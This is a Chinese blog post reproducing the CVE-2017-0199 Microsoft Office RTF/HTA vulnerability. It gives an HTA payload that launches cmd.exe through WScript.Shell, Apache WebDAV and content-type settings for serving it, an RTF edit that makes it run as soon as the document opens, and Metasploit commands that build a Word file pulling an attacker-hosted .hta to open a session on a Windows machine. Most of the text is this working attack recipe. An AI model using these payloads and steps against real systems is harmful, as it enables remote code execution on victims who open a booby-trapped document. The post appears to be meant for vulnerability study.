内容简介:CVE-2017-0199漏洞复现过程
一台apache服务器(这里我用Kali)、POC和一个Word文档。
POC内容大概如下:
<script> a=new ActiveXObject("WScript.Shell"); a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close(); </script>
Word文档内容任意。
然后将其放在Kali服务器上
Apache需要开启DAV支持,具体命令如下
a2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers
测试过程
在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf
root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf
新建Word文档,插入对象
如图
并保存为rtf文件,如233.rtf
删除服务器上的test.rtf文件
并将poc.hta文件复制到ms目录下,并改名为test.rtf
root@kali:/var/www/html/ms# rm -rf test.rtf root@kali:~/Documents# cp poc.hta /var/www/html/ms/test.rtf
修改Apache配置
<Directory /> Dav on </Directory> <Directory /var/www/html/ms/> Header set Content-Type "application/hta" </Directory>
并重启服务器 service apache2 restart
打开233.rtf文档
双击word文档的文字,将会有惊喜弹出
打开文档就弹出的话需要将 \object\objautlink\rsltpict
修改为
\object\objautlink\objupdate\rsltpict
再次打开文件
彩蛋(MSF下的实现)
在kali下执行。
首先更新msf到最新。(假设你们都完成了这个过程)
下载利用脚本
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后msf下执行命令 reload_all
重新加载模块
下载rtf文件到 /usr/share/metasploit-framework/data/exploits
目录
cd /usr/share/metasploit-framework/data/exploits wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf
开启hta服务
msf > use exploit/windows/misc/hta_server msf exploit(hta_server) > show options msf exploit(hta_server) > run
生成exploit文档
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta msf exploit(office_word_hta) > show options msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta msf exploit(office_word_hta) > set FILENAME msf.doc msf exploit(office_word_hta) > run
将生成的msf.doc文件复制到windows上,打开即可获取一个会话
如下所示
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
- CVE-2010-3333漏洞复现
- CVE-2017-12149漏洞复现
- WinRAR 代码执行漏洞复现
- CVE-2017-12615漏洞复现
- 越权操作漏洞的思考与复现
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
Effective JavaScript
David Herman / Addison-Wesley Professional / 2012-12-6 / USD 39.99
"It's uncommon to have a programming language wonk who can speak in such comfortable and friendly language as David does. His walk through the syntax and semantics of JavaScript is both charming and h......一起来看看 《Effective JavaScript》 这本书的介绍吧!